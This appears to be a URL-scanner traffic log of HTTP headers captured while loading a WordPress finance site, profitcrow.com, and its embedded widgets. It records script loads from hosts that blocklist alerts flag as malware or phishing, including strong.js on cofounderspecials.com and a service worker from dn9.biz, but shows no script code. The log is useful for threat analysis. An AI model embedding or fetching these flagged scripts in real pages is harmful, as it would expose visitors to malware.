etag: W/"6366ff60-a40"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /strong.js?v=4.40 HTTP/1.1 
Host: simple.cofounderspecials.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         91.211.91.114
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Mon, 26 Sep 2022 14:52:14 GMT
vary: Accept-Encoding
etag: W/"6331bc9e-920"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
strict-transport-security: max-age=15768000;
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-content/uploads/2022/03/stock-market-graph-financial-data-electronic-board-laptop-screen1.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Tue, 29 Mar 2022 07:12:45 GMT
accept-ranges: bytes
content-length: 162283
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /sw/w1s.js HTTP/1.1 
Host: dn9.biz
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://blueskymotions.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

search
                                         195.154.50.108
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:07 GMT
access-control-allow-origin: *
expires: Sat, 25 Nov 2023 22:08:07 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET / HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
x-powered-by: PHP/7.2.34
set-cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447; expires=Fri, 02-Dec-2022 22:08:03 GMT; Max-Age=604800; path=/; secure
cache-control: max-age=3600, must-revalidate
hummingbird-cache: Served
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /2.0/?path=fxmarkethours/index&showHeader=false&displayMainMenu=true&displayTimezoneChange=true&displayInstrumentChange=true&displaySpreadIndicator=true&displayVolumeIndicator=true&displayVolatilityIndicator=true&displayFollowButton=true&allowTimezoneChange=true&allowInstrumentChange=true&defaultTimezone=0&showIndicator=0&defaultFollowMode=false&worldMapColor=red&hoursBackground=%23444f5f&hoursActiveBackground=%237d92b0&hoursTextColor=%23ffffff&currentHourBGColor=%23f9fdff&dstHourColor=%230cf6ff&indicatorBarColor=%235090c6&graphPointsColor=%23ffffff&spreadTopGraphColor=%23208c1c&spreadBottomGraphColor=%23dc0e0e&volatilityGraphColor=%23146fba&availableInstruments=l%3A&instrument=EUR/USD&width=743&height=466&adv=popup&lang=en HTTP/1.1 
Host: freeserv.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         194.8.15.120
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-content/uploads/2021/12/financial-data.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Wed, 29 Dec 2021 04:37:03 GMT
accept-ranges: bytes
content-length: 1313979
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/?path=intraday_movers_and_shakers/index&headingColor=%23000000&dateColor=%23000000&valueColor=%23000000&bgColor=%23ffffff&width=100%25&height=100%25&adv=popup HTTP/1.1 
Host: freeserv.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         194.8.15.120
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/v/0.42.63/rsindex/rsindex.js HTTP/1.1 
Host: freeserv-static.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://freeserv.dukascopy.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

search
                                         104.22.7.183
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Tue, 03 May 2022 08:54:50 GMT
vary: Accept-Encoding
etag: W/"6270edda-20e97"
expires: Fri, 02 Dec 2022 13:56:25 GMT
cache-control: max-age=604800
content-encoding: gzip
strict-transport-security: max-age=63072000; includeSubDomains
cf-cache-status: HIT
age: 29500
server: cloudflare
cf-ray: 76fdb373bfbafac8-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/index.php?path=common/translation&lang=en HTTP/1.1 
Host: freeserv.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://freeserv.dukascopy.com/2.0/?path=fxmarkethours/index&showHeader=false&displayMainMenu=true&displayTimezoneChange=true&displayInstrumentChange=true&displaySpreadIndicator=true&displayVolumeIndicator=true&displayVolatilityIndicator=true&displayFollowButton=true&allowTimezoneChange=true&allowInstrumentChange=true&defaultTimezone=0&showIndicator=0&defaultFollowMode=false&worldMapColor=red&hoursBackground=%23444f5f&hoursActiveBackground=%237d92b0&hoursTextColor=%23ffffff&currentHourBGColor=%23f9fdff&dstHourColor=%230cf6ff&indicatorBarColor=%235090c6&graphPointsColor=%23ffffff&spreadTopGraphColor=%23208c1c&spreadBottomGraphColor=%23dc0e0e&volatilityGraphColor=%23146fba&availableInstruments=l%3A&instrument=EUR/USD&width=743&height=466&adv=popup&lang=en
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         194.8.15.120
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-content/uploads/2022/03/financial-data.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Tue, 29 Mar 2022 07:10:26 GMT
accept-ranges: bytes
content-length: 217808
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /sw/w1s.js HTTP/1.1 
Host: dn9.biz
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Service-Worker: script
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         62.210.10.215
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:09 GMT
access-control-allow-origin: *
expires: Sat, 25 Nov 2023 22:08:09 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/core.js HTTP/1.1 
Host: freeserv-static.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         104.22.7.183
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 25 Nov 2022 22:08:04 GMT
last-modified: Thu, 01 Aug 2019 13:33:11 GMT
vary: Accept-Encoding
etag: W/"5d42ea17-6e6"
expires: Mon, 28 Nov 2022 17:10:15 GMT
cache-control: max-age=604800
content-encoding: gzip
strict-transport-security: max-age=63072000; includeSubDomains
cf-cache-status: HIT
age: 363469
server: cloudflare
cf-ray: 76fdb3690b35fac8-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/?path=runboard/index&instruments=EUR/USD%2CUSD/JPY%2CGBP/USD%2CEUR/JPY%2CGBP/JPY%2CUSD/CAD%2CXAU/USD%2CAUD/USD%2CUSD/CHF%2CNZD/USD%2CE_Brent%2CE_SandP-500%2CE_DJE50XX%2CE_N225Jap&showDelta=true&showDeltaPercent=true&animationSpeed=100000&fontSize=12&fontFamily=Verdana%2C%20Geneva%2C%20sans-serif&instrumentColor=%23666666&priceColor=%23000000&delimeterColor=%230000FF&bgColor=%23FFFFFF&width=100%25&padding=30px&height=30&adv=popup HTTP/1.1 
Host: freeserv.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         194.8.15.120
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---